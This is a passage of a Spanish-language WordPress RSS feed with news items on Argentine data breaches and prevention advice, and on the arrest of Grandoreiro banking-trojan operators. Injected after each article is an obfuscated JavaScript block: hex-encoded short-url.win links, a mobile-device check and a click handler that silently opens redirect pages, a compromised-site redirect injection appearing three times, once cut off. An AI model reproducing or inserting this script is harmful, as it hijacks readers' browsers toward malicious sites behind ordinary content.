_0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/evita-fraudes-financieros-kaspersky-revela-las-estafas-mas-comunes/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98782</post-id>	</item>
		<item>
		<title>Por qué Argentina es tan vulnerable a los ciberataques</title>
		<link>https://www.todoenunclick.com/por-que-argentina-es-tan-vulnerable-a-los-ciberataques/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Fri, 26 Apr 2024 18:54:19 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Argentina]]></category>
		<category><![CDATA[ciberataques]]></category>
		<category><![CDATA[IFX Networks]]></category>
		<category><![CDATA[prevención]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[vulnerabilidades]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98753</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/04/Ariel-D-Angelo.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Ariel D´Angelo" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/Ariel-D-Angelo.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/Ariel-D-Angelo.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/Ariel-D-Angelo.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/Ariel-D-Angelo.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/Ariel-D-Angelo.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/Ariel-D-Angelo.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/Ariel-D-Angelo.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>En una semana, se conoció que diferentes organismos públicos de nuestro país fueron víctimas de robos de información mediante ciberataques. Primero, un usuario publicó datos del sistema Nosis (del cual se extraen los informes de situación financiera). Luego, otro usuario puso en venta 5,7 millones de imágenes de licencias de conducir argentinas; ofreciendo como muestra los permisos de varios famosos, incluyendo el del Presidente Javier Milei y varios funcionarios. Y al día siguiente, el mismo que publicó los datos de Nosis difundió 65 millones de datos del Registro Nacional de las Personas (ReNaPer). Este último, aparentemente sería producto de una filtración de 2021.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><a></a>Estos ataques no ponen en peligro el funcionamiento de los organismos, pero comprometen datos sensibles de los ciudadanos, que pudieran ser utilizados para diversos ciberdelitos, como la suplantación de identidad, que puede utilizarse para conseguir accesos no autorizados o extorsiones.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><a></a>¿Qué puede hacer el gobierno y los particulares afectados para recuperar estos datos? La respuesta es NADA. Más allá que algunos datos solo son filtraciones que realizan los hackers para dar muestra de su capacidad, sin pedir nada a cambio, la recompra de datos robados o el pago de un rescate por los mismos, no garantiza la seguridad de estos. La característica distintiva de los archivos digitales es que se pueden hacer infinitas copias de idéntica calidad a la de los originales. Por ello, es muy raro que una entidad que fue víctima de un ciberataque intente recuperar esos datos, salvo que afecten directamente a la operatoria o funcionamiento.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><a></a>Lo único que queda por hacer es analizar las vulnerabilidades que permitieron ese ataque y trabajar preventivamente para mitigar la posibilidad de que esto vuelva a ocurrir a quienes fueron objeto de estas intrusiones.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><a></a>¿De qué manera las organizaciones pueden trabajar en la prevención de ciberataques? Estos son los pasos que debería seguir para disminuir sus vulnerabilidades:</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><a></a>1)&nbsp;&nbsp;&nbsp; <strong>Realizar un relevamiento exhaustivo de la seguridad de su infraestructura que resguarda su información sensible:</strong> Esto implica revisar su red, su equipamiento y su software, para determinar si el mismo está preparado para las amenazas que emergen día a día.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><a></a>2)&nbsp;&nbsp;&nbsp; <strong>Análisis de vulnerabilidades:</strong> Se recomienda contratar una consultoría del tipo Ethical Hacking, es decir, un servicio que actúe como un atacante externo (y que esté a la vanguardia de las sofisticadas técnicas de hackeo que existen en la actualidad), para testear todas las vulnerabilidades que tiene la infraestructura actual y diagnosticar acciones de refuerzo necesarias.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><a></a>3)&nbsp;&nbsp;&nbsp; <strong>Implementación de las soluciones técnicas necesarias que deriven de los análisis previos:</strong> Esto incluye el encriptado de información, comunicaciones y almacenamiento, una política de backup y respaldo permanente de información, incorporación de soluciones antivirus de tipo Endpoint Management Software (EMS) y de soluciones de detección y respuesta (EDR). Es fundamental incorporar soluciones basadas en Inteligencia Artificial. Hoy los ciber terroristas utilizan mucho estas herramientas y es imposible combatirlas sin estar en igualdad de condiciones.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><a></a>4)&nbsp;&nbsp;&nbsp; <strong>Crear una cultura de seguridad de la información:</strong> De nada sirve contar con todos los protocolos y mecanismos técnicos de IT, si no se cuenta con una cultura de seguridad instaurada en todos los miembros de la organización y, por otro lado, no se toma a la Ciberseguridad como un subconjunto de lo que implica la Seguridad de la Información. Este último concepto es mucho más amplio, ya que incluye hasta el cuidado físico de la misma.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><a></a>5)&nbsp;&nbsp;&nbsp; <strong>Implementar la figura del Chief Information Security Officer (CISO):</strong> Es el Director de Seguridad de la Información, que suele responder al Chief Security Officer (CSO) y el cual a su vez responde al CEO; pero por fuera de la estructura del CIO. Esto implica tomar la seguridad de la información como parte de la seguridad de toda la empresa y no como un aspecto meramente tecnológico. Conceptualmente esta estructura de roles debería replicarse en los organismos públicos. Si bien estamos hablando de un profesional de alto seniority, no es necesario contratar un recurso permanente para este rol. Existe un servicio denominado <em>CISO as a Service</em> brindados por empresas de TI, que permite a las empresas y organismos contar con un equipo de consultores capaces de generar e implantar políticas de seguridad de la información, supervisar la arquitectura de seguridad de la información de la empresa o dar respuesta ante incidentes de seguridad de la información, entre muchas más funciones.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Hoy cualquier organización es atractiva para ciberdelincuentes, contenga la información que sea. Por ello, es necesario que, independiente del tamaño o del rubro de la compañía, se trabaje de manera preventiva, ya que todos estamos expuestos a los riesgos de la red.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Por</strong><em> Ariel D´Angelo</em>, <em>Gerente de Ingeniería de Negocios de IFX Networks</em></p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/por-que-argentina-es-tan-vulnerable-a-los-ciberataques/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98753</post-id>	</item>
		<item>
		<title>Grandoreiro: El malware bancario que azota a Brasil y más</title>
		<link>https://www.todoenunclick.com/grandoreiro-el-malware-bancario-que-azota-a-brasil-y-mas/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Tue, 19 Mar 2024 17:25:28 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[amenazas]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[ciberdelincuencia]]></category>
		<category><![CDATA[Ciberdelincuentes]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[grandoreiro]]></category>
		<category><![CDATA[INTERPOL]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[prevención]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[troyano]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98630</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Grandoreiro: El malware bancario que azota a Brasil y más" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p>Kaspersky ha colaborado en una acción coordinada por INTERPOL que ha llevado a las autoridades brasileñas a arrestar a cinco administradores que estaban detrás de una operación del troyano bancario Grandoreiro. Según las estimaciones, se cree que los ciberdelincuentes han robado a sus víctimas más de 3,5 millones de euros.

<strong> </strong>Grandoreiro es un troyano bancario de origen brasileño que, según datos de Kaspersky, lleva activo al menos desde 2016. Los ataques realizados a través de este malware suelen comenzar con un correo electrónico de <em>spear-phishing</em> escrito en español, portugués o inglés. Una vez instalado en el dispositivo de la víctima, el troyano rastrea las pulsaciones del teclado, simula la actividad del ratón, comparte pantallas y recopila datos como nombres de usuario, información del sistema operativo, tiempo de ejecución del dispositivo y, lo más importante, identificadores bancarios. Cuando los atacantes se hacen con el <strong>control total de las cuentas bancarias</strong> de las víctimas las vacían, enviando los fondos a través de una red de ‘mulas’ de dinero para el lavado de los ingresos ilícitos.

El troyano cuenta con muchas versiones, lo que podría indicar que diferentes operadores están involucrados en el desarrollo del malware. Según los expertos de Kaspersky, Grandoreiro opera como un proyecto de <strong>Malware-as-a-Service</strong> (MaaS) y tiene como objetivo atacar a más de 900 instituciones financieras en más de 40 países de Europa, Norteamérica y Latinoamérica.

Como parte de esta colaboración, Kaspersky, junto con otros socios privados de INTERPOL, contribuyó al análisis de muestras de malware Grandoreiro, recopiladas por investigaciones de cibercrimen de Brasil y España entre 2020 y 2022. Durante este periodo, <strong>los productos de Kaspersky detectaron 150.000 ataques</strong> con el uso del troyano bancario Grandoreiro en 40.000 usuarios de todo el mundo. España, Brasil, México, Portugal, Argentina y Estados Unidos resultaron ser los países más afectados. Asimismo, en agosto de 2023, se elaboraron informes analíticos que identificaron coincidencias entre las muestras, lo que permitió a los analistas acercarse al grupo de crimen organizado.

<em>“Hemos sido testigos de las campañas de Grandoreiro desde al menos 2016. A lo largo de este tiempo, los atacantes han ido mejorando regularmente sus técnicas, esforzándose por pasar desapercibidos y permanecer activos durante periodos de tiempo más largos. En estas circunstancias, es extremadamente importante que las instituciones financieras se mantengan vigilantes, al tiempo que mejoran sus tecnologías antifraude y sus datos de inteligencia sobre amenazas. Una mayor sinergia entre socios privados y públicos también es fundamental para combatir estos delitos cibernéticos y garantizar un entorno más seguro para usuarios y organizaciones de todo el mundo”, </em>comenta <strong>Fabio Assolini</strong>, <strong>director del Equipo Global de Investigación y Análisis (GReAT) para América Latina en Kaspersky.</strong>

Por su parte, <strong>Craig Jones</strong>, director de la Unidad de Ciberdelincuencia de INTERPOL, subrayó la importancia de un enfoque colectivo: <em>“Este éxito operativo pone de relieve la importancia del intercambio de información policial a través de INTERPOL, y por qué nos hemos comprometido a actuar como puente entre los sectores público y privado. También sienta las bases para una mayor cooperación en la región</em>".

Dado que familias de troyanos, como Grandoreiro, se han expandido activamente en el extranjero, los expertos de Kaspersky esperan ver un aumento en la explotación de troyanos bancarios para móviles. De acuerdo con las <a href="https://securelist.lat/kaspersky-security-bulletin-crimeware-financial-threats-2024/98235/">predicciones de la compañía para el crimeware y las amenazas financieras en 2024</a>, los troyanos bancarios brasileños serán una de las tendencias que dominen el panorama de amenazas financieras este año.
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge 